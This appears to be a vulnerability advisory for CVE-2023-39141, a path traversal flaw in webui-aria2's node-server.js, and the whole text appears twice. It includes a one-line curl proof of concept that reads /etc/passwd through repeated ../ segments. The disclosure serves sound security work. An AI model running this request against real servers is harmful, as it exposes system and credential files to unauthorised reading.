JafarAkhondali/webui-aria2 CVE-2023-39141

## webui-aria2 CVE-2023-39141
CVE-2023-39141 is reserved for this vulnerability

Project link:
https://github.com/ziahamza/webui-aria2/


Vulnerability type:
Path traversal

Root cause: This line https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 accepts file name from URL input, without sanitizing it to be in the same directory.

PoC:
When `node-server.js` is used, an attacker can simply request files outside the serving path
`curl --path-as-is http://localhost:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd`

Root cause: Attacker may read any file that the www user can read.

Vulnerable versions:
Right now all versions even latest commit "109903f0e2774cf948698cd95a01f77f33d7dd2c" are vulnerable.
	CVE-2023-39141 is reserved for this vulnerability

	Project link:
	https://github.com/ziahamza/webui-aria2/


	Vulnerability type:
	Path traversal

	Root cause: This line https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 accepts file name from URL input, without sanitizing it to be in the same directory.

	PoC:
	When `node-server.js` is used, an attacker can simply request files outside the serving path
	`curl --path-as-is http://localhost:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd`

	Root cause: Attacker may read any file that the www user can read.

	Vulnerable versions:
	Right now all versions even latest commit "109903f0e2774cf948698cd95a01f77f33d7dd2c" are vulnerable.